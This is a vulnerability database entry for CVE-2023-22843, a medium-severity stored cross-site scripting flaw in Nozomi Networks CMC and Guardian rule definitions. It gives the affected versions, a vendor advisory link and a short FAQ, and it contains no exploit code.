Vulnerability Description
An authenticated attacker with administrative access to the web management interface can inject malicious JavaScript code inside the definition of a Threat Intelligence rule, that will be stored and can later be executed by another legitimate user viewing the details of such a rule. Via stored Cross-Site Scripting (XSS), an attacker may be able to perform unauthorized actions on behalf of legitimate users and/or gather sensitive information. JavaScript injection was possible in the contents for Yara rules, while limited HTML injection has been proven for packet and STYX rules.
CVSS Score
MEDIUM
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Nozominetworks | Cmc | < 22.6.2 |
| Nozominetworks | Guardian | < 22.6.2 |
Related Weaknesses (CWE)
References
- https://security.nozominetworks.com/NN-2023:4-01Vendor Advisory
- https://security.nozominetworks.com/NN-2023:4-01Vendor Advisory
FAQ
What is CVE-2023-22843?
CVE-2023-22843 is a vulnerability with a CVSS score of 6.4 (MEDIUM). An authenticated attacker with administrative access to the web management interface can inject malicious JavaScript code inside the definition of a Threat Intelligence rule, that will be stored and c...
How severe is CVE-2023-22843?
CVE-2023-22843 has been rated MEDIUM with a CVSS base score of 6.4/10. Review the CVSS metrics above for detailed severity breakdown.
Is there a patch for CVE-2023-22843?
Check the references section above for vendor advisories and patch information. Affected products include: Nozominetworks Cmc, Nozominetworks Guardian.